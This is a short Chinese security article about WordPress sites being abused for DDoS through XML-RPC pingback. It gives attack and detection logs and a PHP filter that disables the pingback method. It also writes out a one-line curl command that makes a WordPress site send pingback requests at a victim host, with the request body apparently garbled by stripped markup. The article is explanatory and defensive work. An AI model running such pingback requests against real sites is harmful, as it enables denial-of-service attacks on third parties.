超過16W的WordPress網(wǎng)站被用來做DDoS攻擊
作者:佚名
任何開啟了Pingback(默認就開啟)的WordPress的站點可以被用來做DDOS攻擊其它服務(wù)器。
任何開啟了Pingback(默認就開啟)的WordPress的站點可以被用來做DDOS攻擊其它服務(wù)器。
看如下日志:
574.86.132.186 - - [09/Mar/2014:11:05:27 -0400] "GET /?4137049=6431829 HTTP/1.0" 403 0 "-" "WordPress/3.8; http://www.mtbgearreview.com" 121.127.254.2 - - [09/Mar/2014:11:05:27 -0400] "GET /?4758117=5073922 HTTP/1.0" 403 0 "-" "WordPress/3.4.2; http://www.kschunvmo.com" 217.160.253.21 - - [09/Mar/2014:11:05:27 -0400] "GET /?7190851=6824134 HTTP/1.0" 403 0 "-" "WordPress/3.8.1; http://www.intoxzone.fr" 193.197.34.216 - - [09/Mar/2014:11:05:27 -0400] "GET /?3162504=9747583 HTTP/1.0" 403 0 "-" "WordPress/2.9.2; http://www.verwaltungmodern.de" ..
可以發(fā)現(xiàn)每次請求還增加了隨機數(shù)/?3162504=9747583以此來繞過緩存。
測試這種攻擊方式只需要一個curl命令就可以了:
$ curl -D - "www.anywordpresssite.com/xmlrpc.php" -d 'pingback.pinghttp://victim.comwww.anywordpresssite.com/postchosen'
想要看你自己的網(wǎng)站是否被用來做了攻擊可以查看日志當中是否包含類似如下的內(nèi)容:
393.174.93.72 - - [09/Mar/2014:20:11:34 -0400] "POST /xmlrpc.php HTTP/1.0" 403 4034 "-" "-" "POSTREQUEST:\x0A\x0Apingback.ping\x0A\x0A \x0A \x0A http://fastbet99.com/?1698491=8940641\x0A \x0A \x0A \x0A \x0A yoursite.com\x0A \x0A \x0A\x0A\x0A" 94.102.63.238 – - [09/Mar/2014:23:21:01 -0400] "POST /xmlrpc.php HTTP/1.0" 403 4034 "-" "-" "POSTREQUEST:\x0A\x0Apingback.ping\x0A\x0A \x0A \x0A http://www.guttercleanerlondon.co.uk/?7964015=3863899\x0A \x0A \x0A \x0A \x0A yoursite.com\x0A \x0A \x0A\x0A\x0A"
防御此問題的推薦方法需要屏蔽 XML-RPC (pingback) 的功能,WordPress主題中添加如下代碼:
add_filter( 'xmlrpc_methods', function( $methods ) {
unset( $methods['pingback.ping'] );
return $methods;
} );責任編輯:藍雨淚
來源:
烏云知識庫
